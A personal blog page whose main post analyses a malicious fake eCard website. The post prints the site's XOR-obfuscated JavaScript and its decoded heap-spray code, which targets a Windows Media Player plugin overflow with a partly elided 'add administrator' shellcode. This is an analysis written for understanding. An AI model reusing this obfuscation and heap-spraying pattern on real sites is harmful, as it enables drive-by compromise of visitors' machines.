“Bruce Schneier doesn’t keep secrets — they keep themselves out of fear.”
Exhibit A: http://wayneandlayne.com/2007/04/09/a-millwall-brick-is-a-weapon-made-of-newspaper/
Exhibit B: http://www.boingboing.net/2007/07/09/howto_make_a_weapon_.html
Someday my prince will come. By prince I mean readers.
assembly code coding foiled-again geek hack hacking idiotic internet link original-content webdesign
by Layne
leave a comment
Well this is a new idea…or maybe not.
I was redirected to a humorous (and by humorous, I mean pathetic) website attempting to infect me with a virus (or so I thought, see below), under the false premise that I had just received an eCard from “a relative”. I took a look at the source code, and an realized that most of the website was seemingly binary data in a javascript function. I dug a bit deeper, and found that they had written a little XOR routine in javascript to transform their ‘binary’ data into actual html, and were using the function to hide the true intent from the casual observer. Here is the function, and a small sample of the ‘binary’ data they included:
Phase One:
<Script Language='JavaScript'>
function xor_str(plain_str, xor_key)
{
var xored_str = "";
for (var i = 0 ; i < plain_str.length; ++i)
xored_str += String.fromCharCode(xor_key ^ plain_str.charCodeAt(i));
return xored_str;
}
var plain_str = "\xbd\x97\x97\x97\x97 ...(There was a lot of stuff here).... \xa3\xbd";
var xored_str = xor_str(plain_str, 157);
document.write(xored_str);
</script>
Phase Two:
I have translated this mess, and come up with the following much-less cryptic code:
<HTML>
<HEAD>
<SCRIPT>
var s=unescape("% u4141%u 4141%u 4141%u 4141%u 4141%u 4141%u 4141%u 4141");
//There were no spaces in the original string above,
// I removed them so they wouldn't be changed.
// The same thing applies below...
do
{
s+=s;
}
while (s.length<0x0900000);
s += unescape("%u 54EB%u 758B ...lots of data was here... %u 702E%u 7068");
</SCRIPT>
</HEAD>
<BODY>
<EMBED SRC="-------(lots more hyphens...)-----AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLAAA (char 0x05)NNNNOOOOAAA (char 0x05)QQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ 0000111122223333444455556666777788889999.wmv"></EMBED>
</BODY>
</HTML>
Breakthrough:
Now, at this point, while trying to find out how to escape those pesky "% u" encodings, I stumbled upon a number of 'cracker' websites talking about a remote overflow in the Windows Media Player browser plugin. Turns out that this is a 'classic' heap spraying (s stands for spray) technique designed to exploit the buffer overflow. The character 0x41 is the letter 'A', and is also a NOP in windows' shellcode. The code generates an incredible number (16 MB worth) of NOP instructions, presumably enough to get past the runtime structures in the plugin's memory. After this massive dump of NOP's, the actual dangerous code is sent, which is apparently a standard Win32 "add administrator" payload from the website Metasploit, which creates a new local administrator with the username 'wmp0wn3d' and password 'password'.
So it turns out that it wasn't just a lame virus install attempt, but also an attempt to exploit a browser plugin security hole. Hurrah for microsoft!
Further Reading:
- http://www.babilonics.com/node/1348
- http://www.governmentsecurity.org/forum/index.php?showtopic=19332
- http://www.webservertalk.com/archive89-2006-11-1708485.html
At Wayne and Layne, we get your news to you 24 hours early!
In Web 2.0 time, that’s a month!
In case you’re wondering, I found some sweet Theremin videos yesterday morning, including a sweet cover of Crazy by Gnarls Barkley.
This afternoon, upon returning from Lake Calhoun, I notice the same video on Boingboing. My heartbeat increases. “Who’s credited–Who’s the via?!!?”
Sigh. Someday.